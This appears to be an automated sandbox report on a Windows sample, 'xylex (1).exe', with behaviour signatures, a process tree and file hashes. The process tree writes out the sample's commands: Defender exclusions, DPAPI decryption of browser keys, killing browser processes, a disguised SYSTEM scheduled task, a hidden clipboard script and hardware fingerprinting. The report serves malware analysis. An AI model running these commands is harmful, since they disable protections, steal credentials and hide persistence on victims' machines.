Analysis
-
max time kernel
11s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03/06/2024, 10:30
Static task
static1
Behavioral task
behavioral1
Sample
xylex (1).exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
xylex (1).exe
Resource
win10v2004-20240226-en
General
-
Target
xylex (1).exe
-
Size
37.6MB
-
MD5
8eacf3f9be7e3735352c4020fc4e05e9
-
SHA1
0bb6c048d9e683e152de21f7d368a4c151095504
-
SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
-
SHA512
2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0
-
SSDEEP
786432:R3on1HvSzxAMNjFZArYs4nPv0so7OZJJe:RYn1HvSpNjXm4P5u2e
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2776 powershell.exe 1648 powershell.exe 2196 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation xylex (1).exe -
Loads dropped DLL 1 IoCs
pid Process 3204 xylex (1).exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2016 cmd.exe 4112 cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2384 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2560 tasklist.exe 1612 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 2 IoCs
pid Process 2952 taskkill.exe 4340 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1648 powershell.exe 1648 powershell.exe 3292 chrome.exe 3292 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3292 chrome.exe 3292 chrome.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1648 powershell.exe Token: SeShutdownPrivilege 3292 chrome.exe Token: SeCreatePagefilePrivilege 3292 chrome.exe Token: SeShutdownPrivilege 3292 chrome.exe Token: SeCreatePagefilePrivilege 3292 chrome.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe 3292 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3292 wrote to memory of 3976 3292 chrome.exe 93 PID 3292 wrote to memory of 3976 3292 chrome.exe 93 PID 3204 wrote to memory of 736 3204 xylex (1).exe 94 PID 3204 wrote to memory of 736 3204 xylex (1).exe 94 PID 736 wrote to memory of 776 736 cmd.exe 95 PID 736 wrote to memory of 776 736 cmd.exe 95 PID 736 wrote to memory of 1648 736 cmd.exe 96 PID 736 wrote to memory of 1648 736 cmd.exe 96 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4616 3292 chrome.exe 98 PID 3292 wrote to memory of 4636 3292 chrome.exe 99 PID 3292 wrote to memory of 4636 3292 chrome.exe 99 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100 PID 3292 wrote to memory of 2040 3292 chrome.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.cmdline"4⤵PID:4056
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2507.tmp" "c:\Users\Admin\AppData\Local\Temp\t2s52bq2\CSCF622ED14E04E49A99BFB8C123274096.TMP"5⤵PID:1944
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1856
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4128
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"2⤵PID:1616
-
C:\Windows\system32\taskkill.exetaskkill /IM chrome.exe /F3⤵
- Kills process with taskkill
PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"2⤵PID:1680
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F3⤵
- Kills process with taskkill
PID:4340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1628
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')3⤵PID:636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:4112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')3⤵PID:4280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵PID:3412
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵PID:740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:2884
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵PID:2548
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Creates scheduled task(s)
PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵PID:4916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.cmdline"4⤵PID:4060
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F75.tmp" "c:\Users\Admin\AppData\Local\Temp\fvqvcua3\CSCA4DC5115CC9C4B2DBC6C33A57973739F.TMP"5⤵PID:1284
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2644
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵PID:3588
-
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵PID:2040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:1800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
PID:2776
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵PID:2344
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:5068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2372
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3012
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"2⤵PID:2396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wininit.exe3⤵PID:2184
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"4⤵PID:1412
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eb3b9758,0x7ff9eb3b9768,0x7ff9eb3b97782⤵PID:3976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:22⤵PID:4616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:82⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:82⤵PID:2040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:12⤵PID:3668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:12⤵PID:4004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4548 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:12⤵PID:4684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:82⤵PID:3468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:82⤵PID:1616
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD598e81de7514087fa618e886aefb86597
SHA1cd4a84c42f9a6c3cd6e6e7b76f9e5944ad6ed8aa
SHA256fac82e07b129c75e8d50fd5d35dafc04c3440ca904ff2ca3ec675725eb72ee6c
SHA5126942aeaeda0a4d7555d66472e567c60e81d14aeb31e07b1cf0ace25cf8e1c488759e7fee78fc42819451863dbcd567061c44ee933397dda0d0f9f8701e07580b
-
Filesize
1KB
MD5d75620c7875c01b02e5fc6398d8b9dae
SHA1ba4406ac940143e73daf2532ce87ba2dc7c0cf6a
SHA256d4000df0cad3869aeb7abcc2531256f6036b5159dc318c4c6bc4bbf3fc34839d
SHA51211b0a86828550f7e2302901f33399e0fb8916181caba061b20ea06193784dada1fb677eadadb185d969fdb54893f2e616c2ce8984f8c86b9ede859c1689760cc
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
-
Filesize
146B
MD514a9867ec0265ebf974e440fcd67d837
SHA1ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA51236c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54
-
Filesize
269KB
MD5d1d5c8ea4a9dd482f2a00a62e6e76519
SHA16747bfa8665aa71ca195fec6cc31cb1288190f92
SHA256635c750cb1db1568ce591d1a44de431ae63320d899e96188126b886c33480bf4
SHA512f3c95aaff263c16885144faac580b95b6b107fc81ea2e40452ed7da840839923c60b7da8c705655d8fbbc1b322b25de1f8d63e03627b65495a85d3fdfefeab95
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
1KB
MD5d1ba74640acd402c938120ae23285c4f
SHA12844c0e8b47cfc917cb7f73a901a2621b4dab28a
SHA25668fef826a5bab279678aa5a4547c8eefde51f97cdbf4f54ca880ea1e6e4e9c6d
SHA51240a23a06d39a04ebd0b258e4240bb665ada4a6cf084b54de5034c94c8ee80cf610af2b5b606b2234620a124ac8ea84a97f7d967dee8e713038dbc41deafe401f
-
Filesize
1KB
MD571c3375194be555a4a50b723092300f5
SHA1be707071e06890f7c4eeb6eb09a403fcee4637e9
SHA256a3ef75679a8cad4f8c5374d3c66516731bde0584e8e0200ec0b14e49e9a90cbb
SHA512150c480ad3b49142bb360ce5f50e2fb32d2ad8dc7114be7d9a7cf941202d509cc00b121ec14c5e29eab72979571e12f0f740f509a90c1c639cb6db2bae9a23de
-
Filesize
1KB
MD57d55c8167210fd96244052f1cfedd35f
SHA1e8062127afda487b1f13260c2b09475473cc0470
SHA25626b59007d076c286ca4a6f84136019d985de9a0a870bee399a0fc8b6a101e439
SHA51240e6ba01576de4ea3523e02781900130c785574f65129a7b964f64fbcd2c4da3288e73f0313ace7c7f07e21cef7c868ca1d251b18abc7dc35ebe3300b25133fe
-
Filesize
1KB
MD59681774c7877eafe2bc51d7076c51911
SHA171a2fa8083d438e8374e04c9afc4b518e47a881d
SHA256fda56f92e8ec8541722d98e9736ed2299417eed38a46ffd846c741596631a61b
SHA512b3dafd18128a6c7c3ee610fe8b4cc25bc85b1b1ee01a5fc2d10395fc26df054d1930e2c103018e1e30987c885709c1330d1b08e799c0e35d664052df011bee1e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
927KB
MD5ed6ab15dec95b162a3fe2008bce06d81
SHA14597069773c578c101fa677bfc45e985dbd6e53d
SHA2562b3f19a142057068ee8426cc2083ddfd317b9cf39f40942229ac2b212ea41420
SHA512ecd7d21eba4803ae3b6c0f217155f4c1b10728b1abcc2a16100750ad39e0225080c59eee1190dd2e3d5ca46acf6919153c00b20eef6f4df7fa952cdb5e246b3b
-
Filesize
3KB
MD5b5a17fa66b623502ef18729759e77601
SHA14bd2871b40beafc24b9d131cc9316b94954c8288
SHA256ffe93a50d638243bf13c17934b87d92a389c44b57e114c57219661d8461c44c5
